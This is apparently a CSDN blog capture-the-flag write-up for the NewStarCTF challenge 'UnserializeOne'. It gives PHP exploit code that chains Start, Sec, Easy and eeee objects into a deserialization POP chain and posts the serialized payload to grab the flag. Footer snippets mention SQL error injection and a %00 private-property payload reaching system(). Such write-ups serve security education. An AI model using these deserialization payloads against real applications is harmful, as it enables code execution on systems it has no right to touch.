[NewStarCTF 公开赛赛道]UnserializeOne

最新推荐文章于 2024-07-28 14:55:40 发布
最新推荐文章于 2024-07-28 14:55:40 发布
阅读量244 收藏 2
点赞数 7
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20242529/article/details/138316502
版权
本文介绍了如何在PHP中使用反序列化技巧,通过构造类的链式调用,利用魔术方法实现复杂的数据结构,最终通过POST请求传递序列化结果获取特定flag的过程。
摘要由CSDN通过智能技术生成

这道题是反序列pop类型的。

这道题的链路比较好复原,正向逆向都可以。

正向复原,图画的比较丑,谅解一下。

反向复原

这里不知道魔术方法的功能可以看这两个链接。

PHP反序列化研究 - 知乎

PHP 魔术方法、序列化与对象复制-腾讯云开发者社区-腾讯云

后续就是编写exp

先将代码复制进vscode,然后把所有和属性无关的删除。

<?php
highlight_file(__FILE__);
class Start{
    public $name;
    public $func;
}

class Sec{
    public $obj;
    public $var;
}

class Easy{
    public $cla;
}

class eeee{
    public $obj;
}


?>

然后构造pop链。

<?php
highlight_file(__FILE__);
class Start{
    public $name;
    public $func;
}

class Sec{
    public $obj;
    public $var;
}

class Easy{
    public $cla;
}

class eeee{
    public $obj;
}

$res = new Start;
$res->name = new Sec;//第一条链
$res->name->obj = new Easy;//第二条链
$res->name->var=new eeee;//第三条链
$res->name->var->obj=new Start;//第四条链
$res->name->var->obj->func=new Sec;//第五条链
echo serialize($res);
?>

将结果以POST请求传给参数POP。得到flag

zero__ddday
关注
  • 7
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
华为中国大学生ICT大赛-网络技术赛道-WLAN知识资料
09-22
《华为中国大学生ICT大赛-网络技术赛道-WLAN知识资料》 在当今信息化社会,无线局域网(WLAN)已经成为我们日常生活和工作中不可或缺的一部分。华为作为全球领先的ICT解决方案提供商,其主办的“华为中国大学生ICT...
魔术方法总结
梦里不知身是客
12-26 9852
__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(
NewStar CTF UnserializeOne
qq_62260766的博客
10-03 1202
NewStarCTF php反序列化
Newstar 新生赛week2
weixin_63231007的博客
10-07 1060
Word-For-You(2 Gen 报错注入)留言之后,点击这里 发现了name参数 1' 测试一下发现报错1' or 1=1%23 之后报错没了,证实存在报错注入?爆出数据库名 wfy?爆出表名 : wfy_admin,wfy_comments,wfy_info?爆出表名: id,text,user,name,display?正着读读不出来?倒着读 读出倒序的flag,}sr0rre_emos_ek2m_t4uJ{galf。
[NewStarCTF 2023 公开赛道]Unserialize
qq_20242529的博客
04-29 214
PHP 序列化的时候 private和 protected 变量会引入不可见字符%00,private是%00类名%00属性名 ,protected为%00*%00属性名 ,注意这两个 %00就是 ascii 码0的字符。$cmd 是 private 属性的,赋值只能在内部赋值。浏览器输出的结果:O:4:"evil":1:{s:9:"evilcmd";要改为O:4:"evil":1:{s:9:"%00evil%00cmd";就是说上面的O:4:"evil":1:{s:9:"evilcmd";
CTF php反序列化总结
m0_53567065的博客
11-17 4447
前言:本⼈⽔平不⾼,只能做⼀些类似收集总结这样的⼯作,本篇文章是我自己在学php反序列化写的一篇姿势收集与总结,有不对的地方欢迎师傅们批评指正~定义:序列化就是将对象转换成字符串。反序列化相反,数据的格式的转换对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。漏洞原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化的过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。常用魔术方法
NewStarCTF2023week2-Unserialize?
Welcome To Myon'Blog !
10-15 6484
创建了一个 evil 对象并设置了 cmd 属性,然后对对象进行了序列化。但要注意,在 PHP 中,如果一个类包含私有属性,并且你尝试序列化该对象,私有属性的值将不会被包括在序列化结果中。因此,在反序列化时,你无法访问 cmd 属性的值,因为它不会被正确反序列化。定义了一个eval类,该类下有一个私有变量cmd和公有成员函数destruct(),该函数在对象的所有引用都被删除或类被销毁时会自动调用;如果满足if条件,没有被匹配到,则会调用system函数,执行我们传入的cmd内容;在根目录下找到flag。
NewStarCTF 公开赛赛道
m0_62129839的博客
10-29 871
reverse一下倒着取得到最后将回显逆转收获无2.文件包含先进行一个代码审计1219893521,伪随机,给了值,爆破出种子就行if语句playload:flag收获base被禁用rot13反序列化,这类题我觉得是我比较薄弱的地方,好好研究研究:poc链我们这样分析,尾链是Sec-> invoke,倒推__invoke() //当脚本尝试将对象调用为函数时触发clone() //当把一个对象赋给另一个对象时自动调用。
ICT比赛网络赛道题库
12-29
ICT比赛网络赛道题库 为2022年ICT比赛网络赛道题库,提供于ICT网络赛道省级初赛和复赛理论知识部分复习人员使用 一共有1100多道题目,其中大多数为往届题目和华为资格认证的题目,考试的时候是没有原题的,但是可以...
NewStarCTF 2023 第一阶段公开赛道部分wp
10-02
这是官方的wp文件,需要的可以下载查看
第十七届智能车竞赛线上比赛赛道设计草案.pdf
03-09
### 第十七届智能车竞赛线上比赛赛道设计草案分析 #### 一、背景介绍 随着科技的进步与发展,智能车竞赛已成为高校学生展现创新能力和技术实力的重要平台之一。蓝桥杯智能汽车比赛作为一项广受关注的赛事,不仅促进...
NAIC2021比赛,AI+无线通信赛道初赛.zip
09-12
NAIC2021比赛,AI+无线通信赛道 ### 软件架构 #### Model_define_tf.py 为定义模型的代码,如encoder、decoder、量化层等,提交时就提交这个和训练好的模型权重 #### Model_train.py 为训练模型的代码 #### ...
PHP框架详解 - symfony框架
丁爸的博客
07-28 737
Symphony框架是一个功能强大、稳定可靠、易于扩展和定制的开源Web框架,适用于构建各种类型的Web应用程序。虽然在某些情况下可能会遇到一些性能和学习曲线的挑战,但是通过合理的配置和优化,以及积极的学习和实践,可以充分发挥Symphony框架的优势,构建高质量的Web应用程序。Symphony框架是一个基于PHP的开源Web框架,它提供了一套丰富的组件和工具,可以帮助开发者更轻松地构建高质量的Web应用程序。
c++语言实现类似swoole扩展的项目实践
北风之神Boreas
07-24 387
项目本质其实是C++项目开发,学员学习后增加对C++技术栈的实践能力,毕竟互联网的核心基石依然是C/C++。 当你要改变以前吸收的知识来源于国内视频教程,国内文章教程 国内文章资料 转向全球老外大佬云集的github开源项目吸收时,就要学C和C++ 而你以前的IT技术就是国内的教程 国内的社区 国内的文章 ,但都是有局限的,所以要转向github社区吸收开源项目的东西来增强个人技术体系。 技术只来源于实践,不是光看,光记就会的东西,纸上得来终觉浅绝知此事要躬行。
ecshop网站部署
qq_63926306的博客
07-24 340
ecshop网站部署
PHP表单必需字段
最新发布
红客网络编程与渗透技术
07-28 140
PHP中处理表单时,确保必填字段被正确填写是非常重要的。这通常涉及到在客户端(使用HTML5)和服务器端(使用PHP)进行验证。以下是一个关于PHP表单必需字段的详细教程,包括如何在客户端和服务器端进行验证。
跨境电商独立站:Shopify/Wordpress/店匠选哪个?
dongdonglin77的博客
07-26 886
商家需要根据自己的资源、能力和市场定位,选择最适合自己的建站工具,并制定有效的运营计划。通过持续的市场调研、品牌建设、流量获取和客户服务,商家可以在独立站的道路上实现可持续发展。
php判断某个目录下是否存在文件
qq_39634880的博客
07-26 385
【代码】php判断某个目录下是否存在文件。
用python的turtle库画一个曲折的赛车赛道
03-18
使用Python的turtle库可以很方便地画出曲折的赛车赛道。下面是一个示例代码: ```python import turtle # 创建画布和画笔 canvas = turtle.Screen() canvas.bgcolor("white") pen = turtle.Turtle() pen.speed(0) # 设置赛道的曲线形状 def draw_curve(): for _ in range(90): pen.forward(1) pen.right(1) # 画出赛车赛道 def draw_race_track(): pen.penup() pen.goto(-200, 0) pen.pendown() pen.width(5) pen.color("black") for _ in range(2): draw_curve() pen.right(180) pen.penup() pen.goto(-200, -100) pen.pendown() pen.width(5) pen.color("black") for _ in range(2): draw_curve() pen.right(180) # 调用函数画出赛车赛道 draw_race_track() # 隐藏画笔 pen.hideturtle() # 关闭画布 canvas.exitonclick() ``` 这段代码使用turtle库创建了一个画布和一个画笔,然后定义了两个函数:`draw_curve()`用于绘制曲线形状,`draw_race_track()`用于绘制赛车赛道。最后调用`draw_race_track()`函数来画出赛车赛道
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值